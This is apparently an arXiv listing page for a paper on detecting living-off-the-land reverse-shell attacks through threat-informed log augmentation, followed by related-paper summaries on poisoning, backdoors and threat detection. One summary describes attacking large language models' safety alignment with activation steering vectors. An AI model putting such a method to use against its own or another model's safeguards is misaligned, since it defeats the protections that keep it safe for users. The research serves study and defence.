Living-off-The-Land Reverse-Shell Detection by Informed Data
Augmentation
- URL: http://arxiv.org/abs/2402.18329v1
- Date: Wed, 28 Feb 2024 13:49:23 GMT
- Title: Living-off-The-Land Reverse-Shell Detection by Informed Data
Augmentation
- Authors: Dmitrijs Trizna, Luca Demetrio, Battista Biggio, Fabio Roli
- Abstract summary: Living-off-the-land (LOTL) offensive methodologies rely on perpetration of malicious actions through chains of commands executed by legitimate applications.
LOTL techniques are well hidden inside the stream of events generated by common legitimate activities.
We propose an augmentation framework to enhance and diversify the presence of LOTL malicious activity inside legitimate logs.
- Score: 16.06998078829495
- License: http://creativecommons.org/licenses/by/4.0/
- Abstract: The living-off-the-land (LOTL) offensive methodologies rely on the
perpetration of malicious actions through chains of commands executed by
legitimate applications, identifiable exclusively by analysis of system logs.
LOTL techniques are well hidden inside the stream of events generated by common
legitimate activities, moreover threat actors often camouflage activity through
obfuscation, making them particularly difficult to detect without incurring in
plenty of false alarms, even using machine learning. To improve the performance
of models in such an harsh environment, we propose an augmentation framework to
enhance and diversify the presence of LOTL malicious activity inside legitimate
logs. Guided by threat intelligence, we generate a dataset by injecting attack
templates known to be employed in the wild, further enriched by malleable
patterns of legitimate activities to replicate the behavior of evasive threat
actors. We conduct an extensive ablation study to understand which models
better handle our augmented dataset, also manipulated to mimic the presence of
model-agnostic evasion and poisoning attacks. Our results suggest that
augmentation is needed to maintain high-predictive capabilities, robustness to
attack is achieved through specific hardening techniques like adversarial
training, and it is possible to deploy near-real-time models with almost-zero
false alarms.
Related papers
- LTRDetector: Exploring Long-Term Relationship for Advanced Persistent Threats Detection [20.360010908574303]
Advanced Persistent Threat (APT) is challenging to detect due to prolonged duration, infrequent occurrence, and adept concealment techniques.
Existing approaches primarily concentrate on the observable traits of attack behaviors, neglecting the intricate relationships formed throughout the persistent attack lifecycle.
We present an innovative APT detection framework named LTRDetector, implementing an end-to-end holistic operation.
arXiv Detail & Related papers (2024-04-04T02:30:51Z) - FreqFed: A Frequency Analysis-Based Approach for Mitigating Poisoning
Attacks in Federated Learning [98.43475653490219]
Federated learning (FL) is susceptible to poisoning attacks.
FreqFed is a novel aggregation mechanism that transforms the model updates into the frequency domain.
We demonstrate that FreqFed can mitigate poisoning attacks effectively with a negligible impact on the utility of the aggregated model.
arXiv Detail & Related papers (2023-12-07T16:56:24Z) - Backdoor Activation Attack: Attack Large Language Models using
Activation Steering for Safety-Alignment [36.91218391728405]
This paper studies the vulnerability of Large Language Models' safety alignment.
Existing attack methods on LLMs rely on poisoned training data or the injection of malicious prompts.
Inspired by recent success in modifying model behavior through steering vectors without the need for optimization, we draw on its effectiveness in red-teaming LLMs.
Our experiment results show that activation attacks are highly effective and add little or no overhead to attack efficiency.
arXiv Detail & Related papers (2023-11-15T23:07:40Z) - Poisoning Network Flow Classifiers [10.055241826257083]
This paper focuses on poisoning attacks, specifically backdoor attacks, against network traffic flow classifiers.
We investigate the challenging scenario of clean-label poisoning where the adversary's capabilities are constrained to tampering only with the training data.
We describe a trigger crafting strategy that leverages model interpretability techniques to generate trigger patterns that are effective even at very low poisoning rates.
arXiv Detail & Related papers (2023-06-02T16:24:15Z) - Enhancing Multiple Reliability Measures via Nuisance-extended
Information Bottleneck [77.37409441129995]
In practical scenarios where training data is limited, many predictive signals in the data can be rather from some biases in data acquisition.
We consider an adversarial threat model under a mutual information constraint to cover a wider class of perturbations in training.
We propose an autoencoder-based training to implement the objective, as well as practical encoder designs to facilitate the proposed hybrid discriminative-generative training.
arXiv Detail & Related papers (2023-03-24T16:03:21Z) - Data Forensics in Diffusion Models: A Systematic Analysis of Membership
Privacy [62.16582309504159]
We develop a systematic analysis of membership inference attacks on diffusion models and propose novel attack methods tailored to each attack scenario.
Our approach exploits easily obtainable quantities and is highly effective, achieving near-perfect attack performance (>0.9 AUCROC) in realistic scenarios.
arXiv Detail & Related papers (2023-02-15T17:37:49Z) - CausalAgents: A Robustness Benchmark for Motion Forecasting using Causal
Relationships [8.679073301435265]
We construct a new benchmark for evaluating and improving model robustness by applying perturbations to existing data.
We use these labels to perturb the data by deleting non-causal agents from the scene.
Under non-causal perturbations, we observe a $25$-$38%$ relative change in minADE as compared to the original.
arXiv Detail & Related papers (2022-07-07T21:28:23Z) - Zero Day Threat Detection Using Graph and Flow Based Security Telemetry [3.3029515721630855]
Zero Day Threats (ZDT) are novel methods used by malicious actors to attack and exploit information technology (IT) networks or infrastructure.
In this paper, we introduce a deep learning based approach to Zero Day Threat detection that can generalize, scale, and effectively identify threats in near real-time.
arXiv Detail & Related papers (2022-05-04T19:30:48Z) - Policy Smoothing for Provably Robust Reinforcement Learning [109.90239627115336]
We study the provable robustness of reinforcement learning against norm-bounded adversarial perturbations of the inputs.
We generate certificates that guarantee that the total reward obtained by the smoothed policy will not fall below a certain threshold under a norm-bounded adversarial of perturbation the input.
arXiv Detail & Related papers (2021-06-21T21:42:08Z) - Graph Backdoor [53.70971502299977]
We present GTA, the first backdoor attack on graph neural networks (GNNs)
GTA departs in significant ways: it defines triggers as specific subgraphs, including both topological structures and descriptive features.
It can be instantiated for both transductive (e.g., node classification) and inductive (e.g., graph classification) tasks.
arXiv Detail & Related papers (2020-06-21T19:45:30Z) - Adversarial vs behavioural-based defensive AI with joint, continual and
active learning: automated evaluation of robustness to deception, poisoning
and concept drift [62.997667081978825]
Recent advancements in Artificial Intelligence (AI) have brought new capabilities to behavioural analysis (UEBA) for cyber-security.
In this paper, we present a solution to effectively mitigate this attack by improving the detection process and efficiently leveraging human expertise.
arXiv Detail & Related papers (2020-01-13T13:54:36Z)
This list is automatically generated from the titles and abstracts of the papers in this site.
This site does not guarantee the quality of this site (including all information) and is not responsible for any consequences.